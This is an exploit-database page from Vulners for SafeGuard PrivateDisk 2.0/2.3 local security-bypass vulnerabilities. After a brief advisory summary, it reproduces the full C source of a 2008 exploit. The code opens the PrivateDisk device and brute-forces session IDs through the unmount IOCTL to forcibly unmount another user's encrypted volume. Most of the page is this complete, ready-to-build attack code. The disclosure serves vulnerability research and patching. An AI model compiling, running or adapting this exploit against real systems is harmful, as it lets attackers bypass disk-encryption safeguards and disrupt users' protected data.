Vulners
Lucene search
SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities
// source: https://www.securityfocus.com/bid/45749/info
SafeGuard PrivateDisk is prone to multiple local security-bypass vulnerabilities.
Attackers with physical access to a computer with the affected application installed can exploit these issues to bypass certain security restrictions and perform unauthorized actions.
SafeGuard PrivateDisk 2.0 and 2.3 are vulnerable; other versions may also be affected.
/* safeguard-pdisk-unmount.c
*
* Copyright (c) 2008 by <[email protected]>
*
* Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk unmount exploit
* by mu-b - Wed 05 Mar 2008
*
* - Tested on: privatediskm.sys 2.2.0.16
* (<= Utimaco Safeware AG (Sophos) - SafeGuard PrivateDisk 2.0)
* privatediskm.sys
* (<= Sophos - SafeGuard PrivateDisk 2.3)
*
* This exploit 'tunnels' an ioctl request to the mounted volume device
* for the volume file given in the argument, the request will forcibly
* unmount the device.
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ddk/ntapi.h>
#define SGPD_UNMOUNT_IOCTL 0x0007200C
#define SGPD_MAX_SESSION_ID 0xFFFFF
struct ioctl_req {
int session_id;
char volume_buf[0x200];
};
int
main (int argc, char **argv)
{
struct ioctl_req req;
DWORD i, j, rlen;
CHAR buf[0x100];
HANDLE hFile;
BOOL result;
printf ("Utimaco Safeware AG - SafeGuard PrivateDisk unmount exploit\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <volume file>\n", argv[0]);
exit (EXIT_SUCCESS);
}
hFile = CreateFileA ("\\\\.\\PrivateDisk", GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (buf, 0, sizeof buf);
strncpy (buf, argv[1], sizeof buf - 1);
for (i = 0, j = 0; i < sizeof req.volume_buf - 4; i += 2, j++)
{
req.volume_buf[i] = buf[j];
req.volume_buf[i+1] = 0x00;
}
for (i = 0; i < SGPD_MAX_SESSION_ID; i++)
{
req.session_id = i;
result = DeviceIoControl (hFile, SGPD_UNMOUNT_IOCTL,
&req, sizeof req,
&req, sizeof req, &rlen, 0);
if (result)
{
printf ("* found, session_id: %d, volume name: %s", i, buf);
break;
}
if (!(i % 64))
{
printf ("* trying session_id: %d\r", i);
}
}
printf ("\n* done\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4